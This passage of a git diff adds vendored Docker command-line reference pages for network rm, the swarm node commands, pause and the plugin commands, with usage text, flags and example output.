my-network +``` + +To delete multiple networks in a single `docker network rm` command, provide +multiple network names or ids. The following example deletes a network with id +`3695c422697f` and a network named `my-network`: + +```bash + $ docker network rm 3695c422697f my-network +``` + +When you specify multiple networks, the command attempts to delete each in turn. +If the deletion of one network fails, the command continues to the next on the +list and tries to delete that. The command reports success or failure for each +deletion. 
+ +## Related information + +* [network disconnect ](network_disconnect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network ls](network_ls.md) +* [network inspect](network_inspect.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md new file mode 100644 index 0000000000..9a81bb9c04 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md @@ -0,0 +1,42 @@ +--- +title: "node demote" +description: "The node demote command description and usage" +keywords: "node, demote" +--- + + + +# node demote + +```markdown +Usage: docker node demote NODE [NODE...] + +Demote one or more nodes from manager in the swarm + +Options: + --help Print usage + +``` + +Demotes an existing manager so that it is no longer a manager. This command targets a docker engine that is a manager in the swarm. + + +```bash +$ docker node demote +``` + +## Related information + +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md new file mode 100644 index 0000000000..fac688fe40 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md @@ -0,0 +1,137 @@ +--- +title: "node inspect" +description: "The node inspect command description and usage" +keywords: "node, inspect" +--- + + + +# node inspect + +```markdown +Usage: docker node inspect [OPTIONS] self|NODE [NODE...] 
+ +Display detailed information on one or more nodes + +Options: + -f, --format string Format the output using the given Go template + --help Print usage + --pretty Print the information in a human friendly format. +``` + +Returns information about a node. By default, this command renders all results +in a JSON array. You can specify an alternate format to execute a +given template for each result. Go's +[text/template](http://golang.org/pkg/text/template/) package describes all the +details of the format. + +Example output: + + $ docker node inspect swarm-manager + [ + { + "ID": "e216jshn25ckzbvmwlnh5jr3g", + "Version": { + "Index": 10 + }, + "CreatedAt": "2016-06-16T22:52:44.9910662Z", + "UpdatedAt": "2016-06-16T22:52:45.230878043Z", + "Spec": { + "Role": "manager", + "Availability": "active" + }, + "Description": { + "Hostname": "swarm-manager", + "Platform": { + "Architecture": "x86_64", + "OS": "linux" + }, + "Resources": { + "NanoCPUs": 1000000000, + "MemoryBytes": 1039843328 + }, + "Engine": { + "EngineVersion": "1.12.0", + "Plugins": [ + { + "Type": "Volume", + "Name": "local" + }, + { + "Type": "Network", + "Name": "overlay" + }, + { + "Type": "Network", + "Name": "null" + }, + { + "Type": "Network", + "Name": "host" + }, + { + "Type": "Network", + "Name": "bridge" + }, + { + "Type": "Network", + "Name": "overlay" + } + ] + } + }, + "Status": { + "State": "ready", + "Addr": "168.0.32.137" + }, + "ManagerStatus": { + "Leader": true, + "Reachability": "reachable", + "Addr": "168.0.32.137:2377" + } + } + ] + + {% raw %} + $ docker node inspect --format '{{ .ManagerStatus.Leader }}' self + false + {% endraw %} + + $ docker node inspect --pretty self + ID: e216jshn25ckzbvmwlnh5jr3g + Hostname: swarm-manager + Joined at: 2016-06-16 22:52:44.9910662 +0000 utc + Status: + State: Ready + Availability: Active + Address: 172.17.0.2 + Manager Status: + Address: 172.17.0.2:2377 + Raft Status: Reachable + Leader: Yes + Platform: + Operating System: linux + Architecture: 
x86_64 + Resources: + CPUs: 4 + Memory: 7.704 GiB + Plugins: + Network: overlay, bridge, null, host, overlay + Volume: local + Engine Version: 1.12.0 + +## Related information + +* [node demote](node_demote.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md new file mode 100644 index 0000000000..5f61713c2e --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md @@ -0,0 +1,130 @@ +--- +title: "node ls" +description: "The node ls command description and usage" +keywords: "node, list" +--- + + + +# node ls + +```markdown +Usage: docker node ls [OPTIONS] + +List nodes in the swarm + +Aliases: + ls, list + +Options: + -f, --filter value Filter output based on conditions provided + --help Print usage + -q, --quiet Only display IDs +``` + +Lists all the nodes that the Docker Swarm manager knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. + +Example output: + +```bash +$ docker node ls + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active +38ciaotwjuritcdtn9npbnkuz swarm-worker1 Ready Active +e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* [id](node_ls.md#id) +* [label](node_ls.md#label) +* [membership](node_ls.md#membership) +* [name](node_ls.md#name) +* [role](node_ls.md#role) + +#### ID + +The `id` filter matches all or part of a node's id. 
+ +```bash +$ docker node ls -f id=1 + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active +``` + +#### Label + +The `label` filter matches nodes based on engine labels and on the presence of a `label` alone or a `label` and a value. Node labels are currently not used for filtering. + +The following filter matches nodes with the `foo` label regardless of its value. + +```bash +$ docker node ls -f "label=foo" + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active +``` + +#### Membership + +The `membership` filter matches nodes based on the presence of a `membership` and a value +`accepted` or `pending`. + +The following filter matches nodes with the `membership` of `accepted`. + +```bash +$ docker node ls -f "membership=accepted" + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active +38ciaotwjuritcdtn9npbnkuz swarm-worker1 Ready Active +``` + +#### Name + +The `name` filter matches on all or part of a node hostname. + +The following filter matches the nodes with a name equal to `swarm-manager1` string. + +```bash +$ docker node ls -f name=swarm-manager1 + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader +``` + +#### Role + +The `role` filter matches nodes based on the presence of a `role` and a value `worker` or `manager`. + +The following filter matches nodes with the `manager` role.
+ +```bash +$ docker node ls -f "role=manager" + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader +``` + +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md new file mode 100644 index 0000000000..92092a8935 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md @@ -0,0 +1,41 @@ +--- +title: "node promote" +description: "The node promote command description and usage" +keywords: "node, promote" +--- + + + +# node promote + +```markdown +Usage: docker node promote NODE [NODE...] + +Promote one or more nodes to manager in the swarm + +Options: + --help Print usage +``` + +Promotes a node to manager. This command targets a docker engine that is a manager in the swarm. + + +```bash +$ docker node promote <node name> +``` + +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md new file mode 100644 index 0000000000..7f07c5ea64 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md @@ -0,0 +1,107 @@ +--- +title: "node ps" +description: "The node ps command description and usage" +keywords: node, tasks, ps +aliases: ["/engine/reference/commandline/node_tasks/"] +--- + + + +# node ps + +```markdown +Usage: docker node ps [OPTIONS] [NODE...] + +List tasks running on one or more nodes, defaults to current node.
+ +Options: + -f, --filter value Filter output based on conditions provided + --help Print usage + --no-resolve Do not map IDs to Names + --no-trunc Do not truncate output +``` + +Lists all the tasks on a Node that Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. + +Example output: + + $ docker node ps swarm-manager1 + NAME IMAGE NODE DESIRED STATE CURRENT STATE + redis.1.7q92v0nr1hcgts2amcjyqg3pq redis:3.0.6 swarm-manager1 Running Running 5 hours + redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 29 seconds + redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds + redis.9.dkkual96p4bb3s6b10r7coxxt redis:3.0.6 swarm-manager1 Running Running 5 seconds + redis.10.0tgctg8h8cech4w0k0gwrmr23 redis:3.0.6 swarm-manager1 Running Running 5 seconds + + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* [name](#name) +* [id](#id) +* [label](#label) +* [desired-state](#desired-state) + +#### name + +The `name` filter matches on all or part of a task's name. + +The following filter matches all tasks with a name containing the `redis` string. 
+ + $ docker node ps -f name=redis swarm-manager1 + NAME IMAGE NODE DESIRED STATE CURRENT STATE + redis.1.7q92v0nr1hcgts2amcjyqg3pq redis:3.0.6 swarm-manager1 Running Running 5 hours + redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 29 seconds + redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds + redis.9.dkkual96p4bb3s6b10r7coxxt redis:3.0.6 swarm-manager1 Running Running 5 seconds + redis.10.0tgctg8h8cech4w0k0gwrmr23 redis:3.0.6 swarm-manager1 Running Running 5 seconds + + +#### id + +The `id` filter matches a task's id. + + $ docker node ps -f id=bg8c07zzg87di2mufeq51a2qp swarm-manager1 + NAME IMAGE NODE DESIRED STATE CURRENT STATE + redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds + + +#### label + +The `label` filter matches tasks based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches tasks with the `usage` label regardless of its value. + +```bash +$ docker node ps -f "label=usage" +NAME IMAGE NODE DESIRED STATE CURRENT STATE +redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 10 minutes +redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 9 minutes +``` + + +#### desired-state + +The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`. 
+ + +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md new file mode 100644 index 0000000000..b245d636cc --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md @@ -0,0 +1,73 @@ +--- +title: "node rm" +description: "The node rm command description and usage" +keywords: "node, remove" +--- + + + +# node rm + +```markdown +Usage: docker node rm [OPTIONS] NODE [NODE...] + +Remove one or more nodes from the swarm + +Aliases: + rm, remove + +Options: + -f, --force Force remove a node from the swarm + --help Print usage +``` + +When run from a manager node, removes the specified nodes from a swarm. + + +Example output: + +```nohighlight +$ docker node rm swarm-node-02 + +Node swarm-node-02 removed from swarm +``` + +Removes the specified nodes from the swarm, but only if the nodes are in the +down state. If you attempt to remove an active node you will receive an error: + +```nohighlight +$ docker node rm swarm-node-03 + +Error response from daemon: rpc error: code = 9 desc = node swarm-node-03 is not +down and can't be removed +``` + +If you lose access to a worker node or need to shut it down because it has been +compromised or is not behaving as expected, you can use the `--force` option. +This may cause transient errors or interruptions, depending on the type of task +being run on the node. + +```nohighlight +$ docker node rm --force swarm-node-03 + +Node swarm-node-03 removed from swarm +``` + +A manager node must be demoted to a worker node (using `docker node demote`) +before you can remove it from the swarm. 
+ +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md new file mode 100644 index 0000000000..aa65d0309e --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md @@ -0,0 +1,71 @@ +--- +title: "node update" +description: "The node update command description and usage" +keywords: "resources, update, dynamically" +--- + + + +## update + +```markdown +Usage: docker node update [OPTIONS] NODE + +Update a node + +Options: + --availability string Availability of the node (active/pause/drain) + --help Print usage + --label-add value Add or update a node label (key=value) (default []) + --label-rm value Remove a node label if exists (default []) + --role string Role of the node (worker/manager) +``` + +### Add label metadata to a node + +Add metadata to a swarm node using node labels. You can specify a node label as +a key with an empty value: + +``` bash +$ docker node update --label-add foo worker1 +``` + +To add multiple labels to a node, pass the `--label-add` flag for each label: + +``` bash +$ docker node update --label-add foo --label-add bar worker1 +``` + +When you [create a service](service_create.md), +you can use node labels as a constraint. A constraint limits the nodes where the +scheduler deploys tasks for a service. + +For example, to add a `type` label to identify nodes where the scheduler should +deploy message queue service tasks: + +``` bash +$ docker node update --label-add type=queue worker1 +``` + +The labels you set for nodes using `docker node update` apply only to the node +entity within the swarm. 
Do not confuse them with the docker daemon labels for +[dockerd](https://docs.docker.com/engine/userguide/labels-custom-metadata/#daemon-labels). + +For more information about labels, refer to [apply custom +metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). + +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pause.md b/vendor/github.com/docker/docker/docs/reference/commandline/pause.md new file mode 100644 index 0000000000..e2dd800d5f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/pause.md @@ -0,0 +1,40 @@ +--- +title: "pause" +description: "The pause command description and usage" +keywords: "cgroups, container, suspend, SIGSTOP" +--- + + + +# pause + +```markdown +Usage: docker pause CONTAINER [CONTAINER...] + +Pause all processes within one or more containers + +Options: + --help Print usage +``` + +The `docker pause` command suspends all processes in the specified containers. +On Linux, this uses the cgroups freezer. Traditionally, when suspending a process +the `SIGSTOP` signal is used, which is observable by the process being suspended. +With the cgroups freezer the process is unaware, and unable to capture, +that it is being suspended, and subsequently resumed. On Windows, only Hyper-V +containers can be paused. + +See the +[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) +for further details. 
+ +## Related information + +* [unpause](unpause.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md new file mode 100644 index 0000000000..9d4e99e56a --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md @@ -0,0 +1,60 @@ +--- +title: "plugin create" +description: "the plugin create command description and usage" +keywords: "plugin, create" +--- + + + +# plugin create + +```markdown +Usage: docker plugin create [OPTIONS] PLUGIN PLUGIN-DATA-DIR + +Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory. + +Options: + --compress Compress the context using gzip + --help Print usage +``` + +Creates a plugin. Before creating the plugin, prepare the plugin's root filesystem as well as +[the config.json](../../extend/config.md) + + +The following example shows how to create a sample `plugin`. + +```bash + +$ ls -ls /home/pluginDir + +4 -rw-r--r-- 1 root root 431 Nov 7 01:40 config.json +0 drwxr-xr-x 19 root root 420 Nov 7 01:40 rootfs + +$ docker plugin create plugin /home/pluginDir +plugin + +NAME TAG DESCRIPTION ENABLED +plugin latest A sample plugin for Docker true +``` + +The plugin can subsequently be enabled for local use or pushed to the public registry. 
+ +## Related information + +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md new file mode 100644 index 0000000000..451f1ace9c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md @@ -0,0 +1,66 @@ +--- +title: "plugin disable" +description: "the plugin disable command description and usage" +keywords: "plugin, disable" +--- + + + +# plugin disable + +```markdown +Usage: docker plugin disable [OPTIONS] PLUGIN + +Disable a plugin + +Options: + -f, --force Force the disable of an active plugin + --help Print usage +``` + +Disables a plugin. The plugin must be installed before it can be disabled, +see [`docker plugin install`](plugin_install.md). Without the `-f` option, +a plugin that has references (eg, volumes, networks) cannot be disabled. 
+ + +The following example shows that the `sample-volume-plugin` plugin is installed +and enabled: + +```bash +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true +``` + +To disable the plugin, use the following command: + +```bash +$ docker plugin disable tiborvass/sample-volume-plugin + +tiborvass/sample-volume-plugin + +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker false +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md new file mode 100644 index 0000000000..df8bee3af5 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md @@ -0,0 +1,65 @@ +--- +title: "plugin enable" +description: "the plugin enable command description and usage" +keywords: "plugin, enable" +--- + + + +# plugin enable + +```markdown +Usage: docker plugin enable [OPTIONS] PLUGIN + +Enable a plugin + +Options: + --help Print usage + --timeout int HTTP client timeout (in seconds) +``` + +Enables a plugin. The plugin must be installed before it can be enabled, +see [`docker plugin install`](plugin_install.md). 
+ + +The following example shows that the `sample-volume-plugin` plugin is installed, +but disabled: + +```bash +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker false +``` + +To enable the plugin, use the following command: + +```bash +$ docker plugin enable tiborvass/sample-volume-plugin + +tiborvass/sample-volume-plugin + +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md new file mode 100644 index 0000000000..fdcc030c43 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md @@ -0,0 +1,164 @@ +--- +title: "plugin inspect" +description: "The plugin inspect command description and usage" +keywords: "plugin, inspect" +--- + + + +# plugin inspect + +```markdown +Usage: docker plugin inspect [OPTIONS] PLUGIN [PLUGIN...] + +Display detailed information on one or more plugins + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +Returns information about a plugin. By default, this command renders all results +in a JSON array. 
+ +Example output: + +```bash +$ docker plugin inspect tiborvass/sample-volume-plugin:latest +``` +```JSON +{ + "Id": "8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21", + "Name": "tiborvass/sample-volume-plugin:latest", + "PluginReference": "tiborvas/sample-volume-plugin:latest", + "Enabled": true, + "Config": { + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Env": [ + "DEBUG=1" + ], + "Args": null, + "Devices": null + }, + "Manifest": { + "ManifestVersion": "v0", + "Description": "A test plugin for Docker", + "Documentation": "https://docs.docker.com/engine/extend/plugins/", + "Interface": { + "Types": [ + "docker.volumedriver/1.0" + ], + "Socket": "plugins.sock" + }, + "Entrypoint": [ + "plugin-sample-volume-plugin", + "/data" + ], + "Workdir": "", + "User": { + }, + "Network": { + "Type": "host" + }, + "Capabilities": null, + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Devices": [ + { + "Name": "device", + "Description": "a host device to mount", + "Settable": null, + "Path": "/dev/cpu_dma_latency" + } + ], + "Env": [ + { + "Name": "DEBUG", + "Description": "If set, prints debug messages", + "Settable": null, + "Value": "1" + } + ], + "Args": { + "Name": "args", + "Description": "command line arguments", + "Settable": null, + "Value": [ + + ] + } + } +} +``` +(output formatted for readability) + + +```bash +$ docker plugin inspect -f '{{.Id}}' 
tiborvass/sample-volume-plugin:latest +``` +``` +8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21 +``` + + +## Related information + +* [plugin create](plugin_create.md) +* [plugin enable](plugin_enable.md) +* [plugin disable](plugin_disable.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md new file mode 100644 index 0000000000..0601193ce0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md @@ -0,0 +1,71 @@ +--- +title: "plugin install" +description: "the plugin install command description and usage" +keywords: "plugin, install" +--- + + + +# plugin install + +```markdown +Usage: docker plugin install [OPTIONS] PLUGIN [KEY=VALUE...] + +Install a plugin + +Options: + --alias string Local name for plugin + --disable Do not enable the plugin on install + --grant-all-permissions Grant all permissions necessary to run the plugin + --help Print usage +``` + +Installs and enables a plugin. Docker looks first for the plugin on your Docker +host. If the plugin does not exist locally, then the plugin is pulled from +the registry. Note that the minimum required registry version to distribute +plugins is 2.3.0 + + +The following example installs `vieus/sshfs` plugin and [set](plugin_set.md) it's env variable +`DEBUG` to 1. Install consists of pulling the plugin from Docker Hub, prompting +the user to accept the list of privileges that the plugin needs, settings parameters + and enabling the plugin. 
+ +```bash +$ docker plugin install vieux/sshfs DEBUG=1 + +Plugin "vieux/sshfs" is requesting the following privileges: + - network: [host] + - device: [/dev/fuse] + - capabilities: [CAP_SYS_ADMIN] +Do you grant the above permissions? [y/N] y +vieux/sshfs +``` + +After the plugin is installed, it appears in the list of plugins: + +```bash +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 vieux/sshfs latest sshFS plugin for Docker true +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md new file mode 100644 index 0000000000..7a3426d95f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md @@ -0,0 +1,53 @@ +--- +title: "plugin ls" +description: "The plugin ls command description and usage" +keywords: "plugin, list" +--- + + + +# plugin ls + +```markdown +Usage: docker plugin ls [OPTIONS] + +List plugins + +Aliases: + ls, list + +Options: + --help Print usage + --no-trunc Don't truncate output +``` + +Lists all the plugins that are currently installed. You can install plugins +using the [`docker plugin install`](plugin_install.md) command. 
+ +Example output: + +```bash +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md new file mode 100644 index 0000000000..e61d10994c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md @@ -0,0 +1,50 @@ +--- +title: "plugin push" +description: "the plugin push command description and usage" +keywords: "plugin, push" +--- + + + +```markdown +Usage: docker plugin push [OPTIONS] PLUGIN[:TAG] + +Push a plugin to a registry + +Options: + --help Print usage +``` + +Use `docker plugin create` to create the plugin. Once the plugin is ready for distribution, +use `docker plugin push` to share your images to the Docker Hub registry or to a self-hosted one. + +Registry credentials are managed by [docker login](login.md). + +The following example shows how to push a sample `user/plugin`. 
+ +```bash + +$ docker plugin ls +ID NAME TAG DESCRIPTION ENABLED +69553ca1d456 user/plugin latest A sample plugin for Docker false +$ docker plugin push user/plugin +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md new file mode 100644 index 0000000000..323ce83f3c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md @@ -0,0 +1,56 @@ +--- +title: "plugin rm" +description: "the plugin rm command description and usage" +keywords: "plugin, rm" +--- + + + +# plugin rm + +```markdown +Usage: docker plugin rm [OPTIONS] PLUGIN [PLUGIN...] + +Remove one or more plugins + +Aliases: + rm, remove + +Options: + -f, --force Force the removal of an active plugin + --help Print usage +``` + +Removes a plugin. You cannot remove a plugin if it is enabled, you must disable +a plugin using the [`docker plugin disable`](plugin_disable.md) before removing +it (or use --force, use of force is not recommended, since it can affect +functioning of running containers using the plugin). 
+ +The following example disables and removes the `sample-volume-plugin:latest` plugin; + +```bash +$ docker plugin disable tiborvass/sample-volume-plugin +tiborvass/sample-volume-plugin + +$ docker plugin rm tiborvass/sample-volume-plugin:latest +tiborvass/sample-volume-plugin +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md new file mode 100644 index 0000000000..c206a8a760 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md @@ -0,0 +1,99 @@ +--- +title: "plugin set" +description: "the plugin set command description and usage" +keywords: "plugin, set" +--- + + + +# plugin set + +```markdown +Usage: docker plugin set PLUGIN KEY=VALUE [KEY=VALUE...] + +Change settings for a plugin + +Options: + --help Print usage +``` + +Change settings for a plugin. The plugin must be disabled. + +The settings currently supported are: + * env variables + * source of mounts + * path of devices + * args + +The following example change the env variable `DEBUG` on the +`sample-volume-plugin` plugin. + +```bash +$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin +[DEBUG=0] + +$ docker plugin set tiborvass/sample-volume-plugin DEBUG=1 + +$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin +[DEBUG=1] +``` + +The following example change the source of the `mymount` mount on +the `myplugin` plugin. 
+
+```bash
+$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin
+/foo
+
+$ docker plugin set myplugin mymount.source=/bar
+
+$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin
+/bar
